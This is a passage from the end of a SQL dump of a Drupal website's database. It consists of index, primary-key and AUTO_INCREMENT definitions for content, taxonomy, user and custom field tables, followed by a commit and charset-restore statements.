  ADD KEY `node_field__type__target_id` (`type`);

--
-- Indexes for table `node_access`
--
ALTER TABLE `node_access`
  ADD PRIMARY KEY (`nid`,`gid`,`realm`,`langcode`);

--
-- Indexes for table `node_field_data`
--
ALTER TABLE `node_field_data`
  ADD PRIMARY KEY (`nid`,`langcode`),
  ADD KEY `node__id__default_langcode__langcode` (`nid`,`default_langcode`,`langcode`),
  ADD KEY `node__vid` (`vid`),
  ADD KEY `node_field__type__target_id` (`type`),
  ADD KEY `node_field__uid__target_id` (`uid`),
  ADD KEY `node_field__created` (`created`),
  ADD KEY `node_field__changed` (`changed`),
  ADD KEY `node__status_type` (`status`,`type`,`nid`),
  ADD KEY `node__frontpage` (`promote`,`status`,`sticky`,`created`),
  ADD KEY `node__title_type` (`title`(191),`type`(4));

--
-- Indexes for table `node_field_revision`
--
ALTER TABLE `node_field_revision`
  ADD PRIMARY KEY (`vid`,`langcode`),
  ADD KEY `node__id__default_langcode__langcode` (`nid`,`default_langcode`,`langcode`),
  ADD KEY `node_field__uid__target_id` (`uid`);

--
-- Indexes for table `node_revision`
--
ALTER TABLE `node_revision`
  ADD PRIMARY KEY (`vid`),
  ADD KEY `node__nid` (`nid`),
  ADD KEY `node_field__langcode` (`langcode`),
  ADD KEY `node_field__revision_uid__target_id` (`revision_uid`);

--
-- Indexes for table `node_revision__body`
--
ALTER TABLE `node_revision__body`
  ADD PRIMARY KEY (`entity_id`,`revision_id`,`deleted`,`delta`,`langcode`),
  ADD KEY `bundle` (`bundle`),
  ADD KEY `revision_id` (`revision_id`),
  ADD KEY `body_format` (`body_format`);

--
-- Indexes for table `node_revision__comment`
--
ALTER TABLE `node_revision__comment`
  ADD PRIMARY KEY (`entity_id`,`revision_id`,`deleted`,`delta`,`langcode`),
  ADD KEY `bundle` (`bundle`),
  ADD KEY `revision_id` (`revision_id`);

--
-- Indexes for table `node_revision__field_activities_description`
--
ALTER TABLE `node_revision__field_activities_description`
  ADD PRIMARY KEY (`entity_id`,`revision_id`,`deleted`,`delta`,`langcode`),
  ADD KEY `bundle` (`bundle`),
  ADD KEY `revision_id` (`revision_id`),
  ADD KEY `field_activities_description_format` (`field_activities_description_format`);

--
-- Indexes for table `node_revision__field_activities_download_file`
--
ALTER TABLE `node_revision__field_activities_download_file`
  ADD PRIMARY KEY (`entity_id`,`revision_id`,`deleted`,`delta`,`langcode`),
  ADD KEY `bundle` (`bundle`),
  ADD KEY `revision_id` (`revision_id`),
  ADD KEY `field_activities_download_file_target_id` (`field_activities_download_file_target_id`);

--
-- Indexes for table `node_revision__field_activities_img`
--
ALTER TABLE `node_revision__field_activities_img`
  ADD PRIMARY KEY (`entity_id`,`revision_id`,`deleted`,`delta`,`langcode`),
  ADD KEY `bundle` (`bundle`),
  ADD KEY `revision_id` (`revision_id`),
  ADD KEY `field_activities_img_target_id` (`field_activities_img_target_id`);

--
-- Indexes for table `node_revision__field_activities_post_date`
--
ALTER TABLE `node_revision__field_activities_post_date`
  ADD PRIMARY KEY (`entity_id`,`revision_id`,`deleted`,`delta`,`langcode`),
  ADD KEY `bundle` (`bundle`),
  ADD KEY `revision_id` (`revision_id`),
  ADD KEY `field_activities_post_date_value` (`field_activities_post_date_value`);

--
-- Indexes for table `node_revision__field_announce_post_date`
--
ALTER TABLE `node_revision__field_announce_post_date`
  ADD PRIMARY KEY (`entity_id`,`revision_id`,`deleted`,`delta`,`langcode`),
  ADD KEY `bundle` (`bundle`),
  ADD KEY `revision_id` (`revision_id`),
  ADD KEY `field_announce_post_date_value` (`field_announce_post_date_value`);

--
-- Indexes for table `node_revision__field_center_description`
--
ALTER TABLE `node_revision__field_center_description`
  ADD PRIMARY KEY (`entity_id`,`revision_id`,`deleted`,`delta`,`langcode`),
  ADD KEY `bundle` (`bundle`),
  ADD KEY `revision_id` (`revision_id`),
  ADD KEY `field_center_description_format` (`field_center_description_format`);

--
-- Indexes for table `node_revision__field_center_download_file`
--
ALTER TABLE `node_revision__field_center_download_file`
  ADD PRIMARY KEY (`entity_id`,`revision_id`,`deleted`,`delta`,`langcode`),
  ADD KEY `bundle` (`bundle`),
  ADD KEY `revision_id` (`revision_id`),
  ADD KEY `field_center_download_file_target_id` (`field_center_download_file_target_id`);

--
-- Indexes for table `node_revision__field_center_img`
--
ALTER TABLE `node_revision__field_center_img`
  ADD PRIMARY KEY (`entity_id`,`revision_id`,`deleted`,`delta`,`langcode`),
  ADD KEY `bundle` (`bundle`),
  ADD KEY `revision_id` (`revision_id`),
  ADD KEY `field_center_img_target_id` (`field_center_img_target_id`);

--
-- Indexes for table `node_revision__field_center_post_date`
--
ALTER TABLE `node_revision__field_center_post_date`
  ADD PRIMARY KEY (`entity_id`,`revision_id`,`deleted`,`delta`,`langcode`),
  ADD KEY `bundle` (`bundle`),
  ADD KEY `revision_id` (`revision_id`),
  ADD KEY `field_center_post_date_value` (`field_center_post_date_value`);

--
-- Indexes for table `node_revision__field_description`
--
ALTER TABLE `node_revision__field_description`
  ADD PRIMARY KEY (`entity_id`,`revision_id`,`deleted`,`delta`,`langcode`),
  ADD KEY `bundle` (`bundle`),
  ADD KEY `revision_id` (`revision_id`),
  ADD KEY `field_description_format` (`field_description_format`);

--
-- Indexes for table `node_revision__field_download_file`
--
ALTER TABLE `node_revision__field_download_file`
  ADD PRIMARY KEY (`entity_id`,`revision_id`,`deleted`,`delta`,`langcode`),
  ADD KEY `bundle` (`bundle`),
  ADD KEY `revision_id` (`revision_id`),
  ADD KEY `field_download_file_target_id` (`field_download_file_target_id`);

--
-- Indexes for table `node_revision__field_image`
--
ALTER TABLE `node_revision__field_image`
  ADD PRIMARY KEY (`entity_id`,`revision_id`,`deleted`,`delta`,`langcode`),
  ADD KEY `bundle` (`bundle`),
  ADD KEY `revision_id` (`revision_id`),
  ADD KEY `field_image_target_id` (`field_image_target_id`);

--
-- Indexes for table `node_revision__field_slider_img`
--
ALTER TABLE `node_revision__field_slider_img`
  ADD PRIMARY KEY (`entity_id`,`revision_id`,`deleted`,`delta`,`langcode`),
  ADD KEY `bundle` (`bundle`),
  ADD KEY `revision_id` (`revision_id`),
  ADD KEY `field_slider_img_target_id` (`field_slider_img_target_id`);

--
-- Indexes for table `node_revision__field_tags`
--
ALTER TABLE `node_revision__field_tags`
  ADD PRIMARY KEY (`entity_id`,`revision_id`,`deleted`,`delta`,`langcode`),
  ADD KEY `bundle` (`bundle`),
  ADD KEY `revision_id` (`revision_id`),
  ADD KEY `field_tags_target_id` (`field_tags_target_id`);

--
-- Indexes for table `node__body`
--
ALTER TABLE `node__body`
  ADD PRIMARY KEY (`entity_id`,`deleted`,`delta`,`langcode`),
  ADD KEY `bundle` (`bundle`),
  ADD KEY `revision_id` (`revision_id`),
  ADD KEY `body_format` (`body_format`);

--
-- Indexes for table `node__comment`
--
ALTER TABLE `node__comment`
  ADD PRIMARY KEY (`entity_id`,`deleted`,`delta`,`langcode`),
  ADD KEY `bundle` (`bundle`),
  ADD KEY `revision_id` (`revision_id`);

--
-- Indexes for table `node__field_activities_description`
--
ALTER TABLE `node__field_activities_description`
  ADD PRIMARY KEY (`entity_id`,`deleted`,`delta`,`langcode`),
  ADD KEY `bundle` (`bundle`),
  ADD KEY `revision_id` (`revision_id`),
  ADD KEY `field_activities_description_format` (`field_activities_description_format`);

--
-- Indexes for table `node__field_activities_download_file`
--
ALTER TABLE `node__field_activities_download_file`
  ADD PRIMARY KEY (`entity_id`,`deleted`,`delta`,`langcode`),
  ADD KEY `bundle` (`bundle`),
  ADD KEY `revision_id` (`revision_id`),
  ADD KEY `field_activities_download_file_target_id` (`field_activities_download_file_target_id`);

--
-- Indexes for table `node__field_activities_img`
--
ALTER TABLE `node__field_activities_img`
  ADD PRIMARY KEY (`entity_id`,`deleted`,`delta`,`langcode`),
  ADD KEY `bundle` (`bundle`),
  ADD KEY `revision_id` (`revision_id`),
  ADD KEY `field_activities_img_target_id` (`field_activities_img_target_id`);

--
-- Indexes for table `node__field_activities_post_date`
--
ALTER TABLE `node__field_activities_post_date`
  ADD PRIMARY KEY (`entity_id`,`deleted`,`delta`,`langcode`),
  ADD KEY `bundle` (`bundle`),
  ADD KEY `revision_id` (`revision_id`),
  ADD KEY `field_activities_post_date_value` (`field_activities_post_date_value`);

--
-- Indexes for table `node__field_announce_post_date`
--
ALTER TABLE `node__field_announce_post_date`
  ADD PRIMARY KEY (`entity_id`,`deleted`,`delta`,`langcode`),
  ADD KEY `bundle` (`bundle`),
  ADD KEY `revision_id` (`revision_id`),
  ADD KEY `field_announce_post_date_value` (`field_announce_post_date_value`);

--
-- Indexes for table `node__field_center_description`
--
ALTER TABLE `node__field_center_description`
  ADD PRIMARY KEY (`entity_id`,`deleted`,`delta`,`langcode`),
  ADD KEY `bundle` (`bundle`),
  ADD KEY `revision_id` (`revision_id`),
  ADD KEY `field_center_description_format` (`field_center_description_format`);

--
-- Indexes for table `node__field_center_download_file`
--
ALTER TABLE `node__field_center_download_file`
  ADD PRIMARY KEY (`entity_id`,`deleted`,`delta`,`langcode`),
  ADD KEY `bundle` (`bundle`),
  ADD KEY `revision_id` (`revision_id`),
  ADD KEY `field_center_download_file_target_id` (`field_center_download_file_target_id`);

--
-- Indexes for table `node__field_center_img`
--
ALTER TABLE `node__field_center_img`
  ADD PRIMARY KEY (`entity_id`,`deleted`,`delta`,`langcode`),
  ADD KEY `bundle` (`bundle`),
  ADD KEY `revision_id` (`revision_id`),
  ADD KEY `field_center_img_target_id` (`field_center_img_target_id`);

--
-- Indexes for table `node__field_center_post_date`
--
ALTER TABLE `node__field_center_post_date`
  ADD PRIMARY KEY (`entity_id`,`deleted`,`delta`,`langcode`),
  ADD KEY `bundle` (`bundle`),
  ADD KEY `revision_id` (`revision_id`),
  ADD KEY `field_center_post_date_value` (`field_center_post_date_value`);

--
-- Indexes for table `node__field_description`
--
ALTER TABLE `node__field_description`
  ADD PRIMARY KEY (`entity_id`,`deleted`,`delta`,`langcode`),
  ADD KEY `bundle` (`bundle`),
  ADD KEY `revision_id` (`revision_id`),
  ADD KEY `field_description_format` (`field_description_format`);

--
-- Indexes for table `node__field_download_file`
--
ALTER TABLE `node__field_download_file`
  ADD PRIMARY KEY (`entity_id`,`deleted`,`delta`,`langcode`),
  ADD KEY `bundle` (`bundle`),
  ADD KEY `revision_id` (`revision_id`),
  ADD KEY `field_download_file_target_id` (`field_download_file_target_id`);

--
-- Indexes for table `node__field_image`
--
ALTER TABLE `node__field_image`
  ADD PRIMARY KEY (`entity_id`,`deleted`,`delta`,`langcode`),
  ADD KEY `bundle` (`bundle`),
  ADD KEY `revision_id` (`revision_id`),
  ADD KEY `field_image_target_id` (`field_image_target_id`);

--
-- Indexes for table `node__field_slider_img`
--
ALTER TABLE `node__field_slider_img`
  ADD PRIMARY KEY (`entity_id`,`deleted`,`delta`,`langcode`),
  ADD KEY `bundle` (`bundle`),
  ADD KEY `revision_id` (`revision_id`),
  ADD KEY `field_slider_img_target_id` (`field_slider_img_target_id`);

--
-- Indexes for table `node__field_tags`
--
ALTER TABLE `node__field_tags`
  ADD PRIMARY KEY (`entity_id`,`deleted`,`delta`,`langcode`),
  ADD KEY `bundle` (`bundle`),
  ADD KEY `revision_id` (`revision_id`),
  ADD KEY `field_tags_target_id` (`field_tags_target_id`);

--
-- Indexes for table `path_alias`
--
ALTER TABLE `path_alias`
  ADD PRIMARY KEY (`id`),
  ADD UNIQUE KEY `path_alias_field__uuid__value` (`uuid`),
  ADD UNIQUE KEY `path_alias__revision_id` (`revision_id`),
  ADD KEY `path_alias__alias_langcode_id_status` (`alias`(191),`langcode`,`id`,`status`),
  ADD KEY `path_alias__path_langcode_id_status` (`path`(191),`langcode`,`id`,`status`);

--
-- Indexes for table `path_alias_revision`
--
ALTER TABLE `path_alias_revision`
  ADD PRIMARY KEY (`revision_id`),
  ADD KEY `path_alias__id` (`id`);

--
-- Indexes for table `queue`
--
ALTER TABLE `queue`
  ADD PRIMARY KEY (`item_id`),
  ADD KEY `name_created` (`name`,`created`),
  ADD KEY `expire` (`expire`);

--
-- Indexes for table `router`
--
ALTER TABLE `router`
  ADD PRIMARY KEY (`name`),
  ADD KEY `pattern_outline_parts` (`pattern_outline`(191),`number_parts`);

--
-- Indexes for table `search_dataset`
--
ALTER TABLE `search_dataset`
  ADD PRIMARY KEY (`sid`,`langcode`,`type`);

--
-- Indexes for table `search_index`
--
ALTER TABLE `search_index`
  ADD PRIMARY KEY (`word`,`sid`,`langcode`,`type`),
  ADD KEY `sid_type` (`sid`,`langcode`,`type`);

--
-- Indexes for table `search_total`
--
ALTER TABLE `search_total`
  ADD PRIMARY KEY (`word`);

--
-- Indexes for table `semaphore`
--
ALTER TABLE `semaphore`
  ADD PRIMARY KEY (`name`),
  ADD KEY `value` (`value`),
  ADD KEY `expire` (`expire`);

--
-- Indexes for table `sequences`
--
ALTER TABLE `sequences`
  ADD PRIMARY KEY (`value`);

--
-- Indexes for table `sessions`
--
ALTER TABLE `sessions`
  ADD PRIMARY KEY (`sid`),
  ADD KEY `timestamp` (`timestamp`),
  ADD KEY `uid` (`uid`);

--
-- Indexes for table `shortcut`
--
ALTER TABLE `shortcut`
  ADD PRIMARY KEY (`id`),
  ADD UNIQUE KEY `shortcut_field__uuid__value` (`uuid`),
  ADD KEY `shortcut_field__shortcut_set__target_id` (`shortcut_set`);

--
-- Indexes for table `shortcut_field_data`
--
ALTER TABLE `shortcut_field_data`
  ADD PRIMARY KEY (`id`,`langcode`),
  ADD KEY `shortcut__id__default_langcode__langcode` (`id`,`default_langcode`,`langcode`),
  ADD KEY `shortcut_field__shortcut_set__target_id` (`shortcut_set`),
  ADD KEY `shortcut_field__link__uri` (`link__uri`(30));

--
-- Indexes for table `shortcut_set_users`
--
ALTER TABLE `shortcut_set_users`
  ADD PRIMARY KEY (`uid`),
  ADD KEY `set_name` (`set_name`);

--
-- Indexes for table `taxonomy_index`
--
ALTER TABLE `taxonomy_index`
  ADD PRIMARY KEY (`nid`,`tid`),
  ADD KEY `term_node` (`tid`,`status`,`sticky`,`created`);

--
-- Indexes for table `taxonomy_term_data`
--
ALTER TABLE `taxonomy_term_data`
  ADD PRIMARY KEY (`tid`),
  ADD UNIQUE KEY `taxonomy_term_field__uuid__value` (`uuid`),
  ADD UNIQUE KEY `taxonomy_term__revision_id` (`revision_id`),
  ADD KEY `taxonomy_term_field__vid__target_id` (`vid`);

--
-- Indexes for table `taxonomy_term_field_data`
--
ALTER TABLE `taxonomy_term_field_data`
  ADD PRIMARY KEY (`tid`,`langcode`),
  ADD KEY `taxonomy_term__id__default_langcode__langcode` (`tid`,`default_langcode`,`langcode`),
  ADD KEY `taxonomy_term__revision_id` (`revision_id`),
  ADD KEY `taxonomy_term_field__name` (`name`(191)),
  ADD KEY `taxonomy_term__status_vid` (`status`,`vid`,`tid`),
  ADD KEY `taxonomy_term__tree` (`vid`,`weight`,`name`(191)),
  ADD KEY `taxonomy_term__vid_name` (`vid`,`name`(191));

--
-- Indexes for table `taxonomy_term_field_revision`
--
ALTER TABLE `taxonomy_term_field_revision`
  ADD PRIMARY KEY (`revision_id`,`langcode`),
  ADD KEY `taxonomy_term__id__default_langcode__langcode` (`tid`,`default_langcode`,`langcode`),
  ADD KEY `taxonomy_term_field__description__format` (`description__format`);

--
-- Indexes for table `taxonomy_term_revision`
--
ALTER TABLE `taxonomy_term_revision`
  ADD PRIMARY KEY (`revision_id`),
  ADD KEY `taxonomy_term__tid` (`tid`),
  ADD KEY `taxonomy_term_field__revision_user__target_id` (`revision_user`);

--
-- Indexes for table `taxonomy_term_revision__parent`
--
ALTER TABLE `taxonomy_term_revision__parent`
  ADD PRIMARY KEY (`entity_id`,`revision_id`,`deleted`,`delta`,`langcode`),
  ADD KEY `bundle` (`bundle`),
  ADD KEY `revision_id` (`revision_id`),
  ADD KEY `parent_target_id` (`parent_target_id`);

--
-- Indexes for table `taxonomy_term__parent`
--
ALTER TABLE `taxonomy_term__parent`
  ADD PRIMARY KEY (`entity_id`,`deleted`,`delta`,`langcode`),
  ADD KEY `revision_id` (`revision_id`),
  ADD KEY `parent_target_id` (`parent_target_id`),
  ADD KEY `bundle_delta_target_id` (`bundle`,`delta`,`parent_target_id`);

--
-- Indexes for table `users`
--
ALTER TABLE `users`
  ADD PRIMARY KEY (`uid`),
  ADD UNIQUE KEY `user_field__uuid__value` (`uuid`);

--
-- Indexes for table `users_data`
--
ALTER TABLE `users_data`
  ADD PRIMARY KEY (`uid`,`module`,`name`),
  ADD KEY `module` (`module`),
  ADD KEY `name` (`name`);

--
-- Indexes for table `users_field_data`
--
ALTER TABLE `users_field_data`
  ADD PRIMARY KEY (`uid`,`langcode`),
  ADD UNIQUE KEY `user__name` (`name`,`langcode`),
  ADD KEY `user__id__default_langcode__langcode` (`uid`,`default_langcode`,`langcode`),
  ADD KEY `user_field__mail` (`mail`(191)),
  ADD KEY `user_field__created` (`created`),
  ADD KEY `user_field__access` (`access`);

--
-- Indexes for table `user__roles`
--
ALTER TABLE `user__roles`
  ADD PRIMARY KEY (`entity_id`,`deleted`,`delta`,`langcode`),
  ADD KEY `bundle` (`bundle`),
  ADD KEY `revision_id` (`revision_id`),
  ADD KEY `roles_target_id` (`roles_target_id`);

--
-- Indexes for table `user__user_picture`
--
ALTER TABLE `user__user_picture`
  ADD PRIMARY KEY (`entity_id`,`deleted`,`delta`,`langcode`),
  ADD KEY `bundle` (`bundle`),
  ADD KEY `revision_id` (`revision_id`),
  ADD KEY `user_picture_target_id` (`user_picture_target_id`);

--
-- Indexes for table `watchdog`
--
ALTER TABLE `watchdog`
  ADD PRIMARY KEY (`wid`),
  ADD KEY `type` (`type`),
  ADD KEY `uid` (`uid`),
  ADD KEY `severity` (`severity`);

--
-- Indexes for table `we_megamenu`
--
ALTER TABLE `we_megamenu`
  ADD PRIMARY KEY (`menu_name`,`theme`);

--
-- AUTO_INCREMENT for dumped tables
--

--
-- AUTO_INCREMENT for table `batch`
--
ALTER TABLE `batch`
  MODIFY `bid` int UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Primary Key: Unique batch ID.', AUTO_INCREMENT=19;

--
-- AUTO_INCREMENT for table `block_content`
--
ALTER TABLE `block_content`
  MODIFY `id` int UNSIGNED NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=25;

--
-- AUTO_INCREMENT for table `block_content_revision`
--
ALTER TABLE `block_content_revision`
  MODIFY `revision_id` int UNSIGNED NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=25;

--
-- AUTO_INCREMENT for table `captcha_sessions`
--
ALTER TABLE `captcha_sessions`
  MODIFY `csid` int NOT NULL AUTO_INCREMENT COMMENT 'CAPTCHA session ID.', AUTO_INCREMENT=15609;

--
-- AUTO_INCREMENT for table `comment`
--
ALTER TABLE `comment`
  MODIFY `cid` int UNSIGNED NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `file_managed`
--
ALTER TABLE `file_managed`
  MODIFY `fid` int UNSIGNED NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=882;

--
-- AUTO_INCREMENT for table `flood`
--
ALTER TABLE `flood`
  MODIFY `fid` int NOT NULL AUTO_INCREMENT COMMENT 'Unique flood event ID.', AUTO_INCREMENT=13536;

--
-- AUTO_INCREMENT for table `help_search_items`
--
ALTER TABLE `help_search_items`
  MODIFY `sid` int UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Numeric index of this item in the search index', AUTO_INCREMENT=94;

--
-- AUTO_INCREMENT for table `locales_location`
--
ALTER TABLE `locales_location`
  MODIFY `lid` int NOT NULL AUTO_INCREMENT COMMENT 'Unique identifier of this location.', AUTO_INCREMENT=4953;

--
-- AUTO_INCREMENT for table `locales_source`
--
ALTER TABLE `locales_source`
  MODIFY `lid` int NOT NULL AUTO_INCREMENT COMMENT 'Unique identifier of this string.', AUTO_INCREMENT=4698;

--
-- AUTO_INCREMENT for table `media`
--
ALTER TABLE `media`
  MODIFY `mid` int UNSIGNED NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `media_revision`
--
ALTER TABLE `media_revision`
  MODIFY `vid` int UNSIGNED NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `menu_link_content`
--
ALTER TABLE `menu_link_content`
  MODIFY `id` int UNSIGNED NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=13;

--
-- AUTO_INCREMENT for table `menu_link_content_revision`
--
ALTER TABLE `menu_link_content_revision`
  MODIFY `revision_id` int UNSIGNED NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=13;

--
-- AUTO_INCREMENT for table `menu_tree`
--
ALTER TABLE `menu_tree`
  MODIFY `mlid` int UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'The menu link ID (mlid) is the integer primary key.', AUTO_INCREMENT=307;

--
-- AUTO_INCREMENT for table `node`
--
ALTER TABLE `node`
  MODIFY `nid` int UNSIGNED NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=207;

--
-- AUTO_INCREMENT for table `node_revision`
--
ALTER TABLE `node_revision`
  MODIFY `vid` int UNSIGNED NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=724;

--
-- AUTO_INCREMENT for table `path_alias`
--
ALTER TABLE `path_alias`
  MODIFY `id` int UNSIGNED NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=690;

--
-- AUTO_INCREMENT for table `path_alias_revision`
--
ALTER TABLE `path_alias_revision`
  MODIFY `revision_id` int UNSIGNED NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=690;

--
-- AUTO_INCREMENT for table `queue`
--
ALTER TABLE `queue`
  MODIFY `item_id` int UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Primary Key: Unique item ID.', AUTO_INCREMENT=10618;

--
-- AUTO_INCREMENT for table `sequences`
--
ALTER TABLE `sequences`
  MODIFY `value` int UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'The value of the sequence.', AUTO_INCREMENT=15;

--
-- AUTO_INCREMENT for table `shortcut`
--
ALTER TABLE `shortcut`
  MODIFY `id` int UNSIGNED NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=3;

--
-- AUTO_INCREMENT for table `taxonomy_term_data`
--
ALTER TABLE `taxonomy_term_data`
  MODIFY `tid` int UNSIGNED NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `taxonomy_term_revision`
--
ALTER TABLE `taxonomy_term_revision`
  MODIFY `revision_id` int UNSIGNED NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `users`
--
ALTER TABLE `users`
  MODIFY `uid` int UNSIGNED NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=3;

--
-- AUTO_INCREMENT for table `watchdog`
--
ALTER TABLE `watchdog`
  MODIFY `wid` bigint NOT NULL AUTO_INCREMENT COMMENT 'Primary Key: Unique watchdog event ID.';
COMMIT;

/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;
/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;
